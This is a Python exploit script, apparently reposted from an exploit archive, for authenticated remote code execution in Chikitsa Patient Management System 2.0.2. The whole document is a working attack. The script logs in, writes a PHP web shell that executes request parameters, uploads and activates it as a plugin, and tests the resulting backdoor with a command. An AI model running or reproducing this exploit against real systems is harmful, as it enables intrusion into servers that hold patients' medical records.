Exploit for Chikitsa Patient Management System 2.0.2 Plugin Remote Code Execution

## https://sploitus.com/exploit?id=PACKETSTORM:165204
# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)  
# Date: 03/12/2021  
# Exploit Author: 0z09e (https://twitter.com/0z09e)  
# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/  
# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download  
# Version: 2.0.2  
# Tested on: Ubuntu  
  
import requests  
import os  
import argparse  
  
def login(session , target , username , password):  
print("[+] Attempting to login with the credential")  
url = target + "/index.php/login/valid_signin"  
login_data = {"username" : username , "password" : password}  
session.post(url , data=login_data , verify=False)  
return session  
  
def generate_plugin():  
print("[+] Generating a malicious plugin")  
global tmp_dir  
tmp_dir = os.popen("mktemp -d").read().rstrip()  
open(f"{tmp_dir}/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")  
os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()  
  
def upload_plugin(session , target):  
print("[+] Uploading the plugin into the server.")  
url = target + "/index.php/module/upload_module/"  
file = open(f"{tmp_dir}/rce.zip" , "rb").read()  
session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})  
session.get(target + "/index.php/module/activate_module/rce" , verify=False)  
print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")  
print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")  
  
def main():  
parser = argparse.ArgumentParser("""  
__ _ __ _ __   
_____/ /_ (_) /__(_) /__________ _  
/ ___/ __ \/ / //_/ / __/ ___/ __ `/  
/ /__/ / / / / ,< / / /_(__ ) /_/ /   
\___/_/ /_/_/_/|_/_/\__/____/\__,_/   
  
Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution :   
POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)  
req_args = parser.add_argument_group('required arguments')  
req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")  
req_args.add_argument("-u" , "--username" , help="Username" , required=True)  
req_args.add_argument("-p" , "--password" , help="password", required=True)  
args = parser.parse_args()  
  
target = args.URL  
if target[-1] == "/":  
target = target[:-1]  
username = args.username  
password = args.password  
  
session = requests.session()  
login(session , target , username , password)  
generate_plugin()  
upload_plugin(session , target)  
  
if __name__ == "__main__":  
main()